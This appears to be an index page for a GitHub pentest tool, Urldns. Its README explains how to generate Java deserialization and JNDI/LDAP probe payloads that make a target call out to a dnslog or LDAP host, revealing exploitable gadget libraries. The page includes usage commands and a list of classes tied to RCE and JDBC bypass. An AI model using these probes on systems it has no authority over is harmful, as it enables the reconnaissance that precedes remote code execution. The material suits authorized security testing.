Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/kezibei/Urldns
https://github.com/kezibei/Urldns
Last synced: 3 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/kezibei/Urldns
- Owner: kezibei
- Created: 2022-01-18T06:51:51.000Z (almost 3 years ago)
- Default Branch: main
- Last Pushed: 2023-10-24T07:43:50.000Z (about 1 year ago)
- Last Synced: 2024-05-13T19:33:21.353Z (6 months ago)
- Language: Java
- Size: 7.16 MB
- Stars: 244
- Watchers: 6
- Forks: 38
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - kezibei/Urldns - (Java)
README
# Urldns
此工具仅能dnslog漏洞测试,不可用于非法用途,有问题请联系[email protected]
有三种模式,base64,file,ldap,file默认当前目录生成文件1.ser,ldap默认端口1389
请输入: java -jar Urldns.jar base64 all dnslog.com
或者 : java -jar Urldns.jar file all dnslog.com
或者 : java -jar Urldns.jar ldap all dnslog.com
目前支持的内置探测类如下,使用all将全部探测,可以将all替换为如下简写进行单独探测,也可以填写自定义的类进行探测。如果想同时探测多个类,用|分割。
```
CommonsCollections13567
CommonsCollections24
CommonsBeanutils2
C3P0
AspectJWeaver
bsh
Groovy
Becl
Jdk7u21
JRE8u20
ROME
Fastjson
Jackson
SpringAOP
winlinux
```
使用ldap模式的all将额外探测如下
```
//BeanFactory,配合无参构造和单String方法RCE
org.apache.naming.factory.BeanFactory
javax.el.ELProcessor
groovy.lang.GroovyShell
groovy.lang.GroovyClassLoader
org.yaml.snakeyaml.Yaml
com.thoughtworks.xstream.XStream
org.xmlpull.v1.XmlPullParserException
org.xmlpull.mxp1.MXParser
org.mvel2.sh.ShellSession
com.sun.glass.utils.NativeLibLoader
//XXE和文件写入
org.apache.catalina.UserDatabase
org.apache.catalina.users.MemoryUserDatabaseFactory
//jdbc bypass
org.h2.Driver
org.postgresql.Driver
com.mysql.jdbc.Driver
com.mysql.cj.jdbc.Driver
com.mysql.fabric.jdbc.FabricMySQLDriver
oracle.jdbc.driver.OracleDriver
org.apache.tomcat.dbcp.dbcp.BasicDataSourceFactory
org.apache.tomcat.dbcp.dbcp2.BasicDataSourceFactory
org.apache.commons.dbcp.BasicDataSourceFactory
org.apache.commons.pool.KeyedObjectPoolFactory
org.apache.commons.dbcp2.BasicDataSourceFactory
org.apache.commons.pool2.PooledObjectFactory
org.apache.tomcat.jdbc.pool.DataSourceFactory
org.apache.juli.logging.LogFactory
com.alibaba.druid.pool.DruidDataSourceFactory
//WebSphere加载jar RCE
com.ibm.ws.client.applicationclient.ClientJ2CCFFactory
com.ibm.ws.webservices.engine.client.ServiceFactory
```
示例: java -jar Urldns.jar base64 "CommonsBeanutils2|C3P0|ognl.OgnlContext" dnslog.com
常用: java -jar Urldns.jar base64 all dnslog.com
效果如下图
ldap模式支持ldap://2.2.2.2:1389/jndi,将不再反序列化而是远程加载class,以探测是否出网